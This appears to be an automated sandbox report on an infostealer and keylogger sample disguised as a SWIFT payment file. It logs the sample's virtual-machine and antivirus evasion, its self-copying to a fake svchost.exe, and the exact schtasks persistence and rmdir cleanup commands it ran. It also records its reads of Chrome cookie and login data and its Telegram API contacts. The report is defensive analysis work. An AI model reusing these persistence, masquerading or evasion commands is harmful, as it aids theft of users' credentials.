                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508 | Thread sleep time: -99641s >= -30000s
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 1792 | Thread sleep count: 1592 > 30
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508 | Thread sleep time: -99515s >= -30000s
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508 | Thread sleep time: -99405s >= -30000s
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508 | Thread sleep time: -99285s >= -30000s
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508 | Thread sleep time: -99170s >= -30000s
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508 | Thread sleep time: -99058s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe TID: 7096 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe TID: 6992 | Thread sleep count: 38 > 30
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe TID: 6992 | Thread sleep time: -2280000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe TID: 7004 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe TID: 7004 | Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe TID: 7000 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe TID: 6960 | Thread sleep time: -780000s >= -30000s
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Window / User API: threadDelayed 1592
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Thread delayed: delay time: 60000
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Thread delayed: delay time: 100000
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Thread delayed: delay time: 99641
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Thread delayed: delay time: 99515
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Thread delayed: delay time: 99405
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Thread delayed: delay time: 99285
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Thread delayed: delay time: 99170
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Thread delayed: delay time: 99058
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Thread delayed: delay time: 60000
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Thread delayed: delay time: 100000
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | File Volume queried: C:\ FullSizeInformation
                    Source: Amcache.hve.37.dr | Binary or memory string: VMware
                    Source: Amcache.hve.37.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware svga
                    Source: Amcache.hve.37.dr | Binary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.37.dr | Binary or memory string: VMware, Inc.
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: hyper-v
                    Source: Amcache.hve.37.dr | Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                    Source: svchost.exe, 0000000E.00000002.650106846.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\t Certificate Authorit
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.480236293.0000000000B10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareYF66TM4VWin32_VideoController8M1TH8OBVideoController120060621000000.000000-000340.6003display.infMSBDA49_9YZLWPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsY48G5CES
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qemup
                    Source: Amcache.hve.37.dr | Binary or memory string: VMware, Inc.me
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.649408260.0000000000E85000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: Amcache.hve.37.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                    Source: Amcache.hve.37.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1g
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware(@
                    Source: Amcache.hve.37.dr | Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
                    Source: Amcache.hve.37.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.37.dr | Binary or memory string: VMware7,1
                    Source: Amcache.hve.37.dr | Binary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.37.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.37.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.37.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.37.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                    Source: Amcache.hve.37.dr | Binary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
                    Source: svchost.exe, 00000028.00000002.648938899.000000000104F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareYF66TM4VWin32_VideoController8M1TH8OBVideoController120060621000000.000000-000340.6003display.infMSBDA49_9YZLWPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsY48G5CESp
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process queried: DebugPort
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Domain query: 245.246.1.0.in-addr.arpa
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Network Connect: 149.154.167.220 443
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Domain query: ipapi.co
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Domain query: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Domain query: api.telegram.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Network Connect: 173.231.16.76 80
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Network Connect: 172.67.69.226 443
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, Log/Modules/Keylogger/MainModule.cs | Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, Log/Miscellaneous/WinApi.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Memory written: C:\Users\user\Desktop\SWIFT_USD_165092.exe base: 720000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Memory written: C:\Users\user\AppData\Roaming\svchost\svchost.exe base: 920000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Memory written: C:\Users\user\AppData\Roaming\svchost\svchost.exe base: B90000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Users\user\Desktop\SWIFT_USD_165092.exe C:\Users\user\Desktop\SWIFT_USD_165092.exe
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\Desktop\SWIFT_USD_165092.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit Cards
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Cookies
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Autofills
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\404d522a-62f5-4eb2-91f4-202649d15261
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Users\user\AppData\Roaming\svchost\svchost.exe C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchost
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /f
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\AppData\Roaming\svchost\svchost.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exe
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit Cards
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Cookies
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Autofills
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\88560075-49ce-438f-ba24-9980eb388270
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Queries volume information: C:\Users\user\Desktop\SWIFT_USD_165092.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Queries volume information: C:\Users\user\AppData\Roaming\svchost\svchost.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: procmon.exe
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tcpview.exe
                    Source: Amcache.hve.37.dr | Binary or memory string: msmpeng.exe
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wireshark.exe
                    Source: Amcache.hve.37.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: lordpe.exe
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.481123989.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000003.480236293.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.588963258.0000000005509000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autoruns.exe
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ollydbg.exe
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: regmon.exe

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SWIFT_USD_165092.exe PID: 5640, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5484, type: MEMORYSTR
                    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara match | File source: 0.2.SWIFT_USD_165092.exe.4068d70.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SWIFT_USD_165092.exe.3e61140.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SWIFT_USD_165092.exe.3e61140.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.519129931.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.399919891.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SWIFT_USD_165092.exe PID: 5640, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5484, type: MEMORYSTR
                    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: Yara match | File source: Process Memory Space: SWIFT_USD_165092.exe PID: 5640, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5484, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SWIFT_USD_165092.exe PID: 5640, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5484, type: MEMORYSTR
                    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara match | File source: 0.2.SWIFT_USD_165092.exe.4068d70.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SWIFT_USD_165092.exe.3e61140.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.SWIFT_USD_165092.exe.3e61140.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.519129931.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.399919891.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: SWIFT_USD_165092.exe PID: 5640, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5484, type: MEMORYSTR
                    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                    MITRE ATT&CK Matrix (techniques grouped by tactic; a leading number is the count shown in that matrix cell)
                    Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                    Execution: 131 Windows Management Instrumentation; 1 Native API; 1 Scheduled Task/Job; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
                    Persistence: 1 DLL Side-Loading; 1 Valid Accounts; 1 Scheduled Task/Job; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                    Privilege Escalation: 1 DLL Side-Loading; 1 Valid Accounts; 1 Access Token Manipulation; 211 Process Injection; 1 Scheduled Task/Job; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                    Defense Evasion: 1 Disable or Modify Tools; 11 Obfuscated Files or Information; 1 DLL Side-Loading; 11 Masquerading; 1 Valid Accounts; 1 Access Token Manipulation; 151 Virtualization/Sandbox Evasion; 211 Process Injection; Masquerading
                    Credential Access: 1 OS Credential Dumping; 211 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                    Discovery: 1 File and Directory Discovery; 34 System Information Discovery; 1 Query Registry; 351 Security Software Discovery; 2 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
                    Collection: 1 Archive Collected Data; 1 Data from Local System; 211 Input Capture; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                    Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                    Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                    Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                    Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 872897 | Sample: SWIFT_USD_165092.exe | Startdate: 22/05/2023 | Architecture: WINDOWS | Score: 100
                    (Bracketed numbers are graph node IDs; other numbers next to a process are the counts shown beside that node on the graph, see legend.)
                    [2] Start: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 12 other signatures. Started: svchost.exe [8] 1; SWIFT_USD_165092.exe [11] 2; svchost.exe [14]; msiexec.exe [16]
                    [8] svchost.exe: System process connects to network (likely due to code injection or exploit); Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 2 other signatures. Started: svchost.exe [18] 14 29; cmd.exe [22]; 2 other processes [35]
                    [11] SWIFT_USD_165092.exe: dropped C:\Users\user\...\SWIFT_USD_165092.exe.log (ASCII); May check the online IP address of the machine; Injects a PE file into a foreign processes. Started: cmd.exe [24] 2; cmd.exe [26] 3; SWIFT_USD_165092.exe [29] 15 36; cmd.exe [31] 1
                    [14] svchost.exe: Started: svchost.exe [33]; 3 other processes [37]
                    [18] svchost.exe: DNS/IP: api.ipify.org; 245.246.1.0.in-addr.arpa. System process connects to network (likely due to code injection or exploit); Tries to harvest and steal browser information (history, passwords, etc). Started: 6 other processes [45]
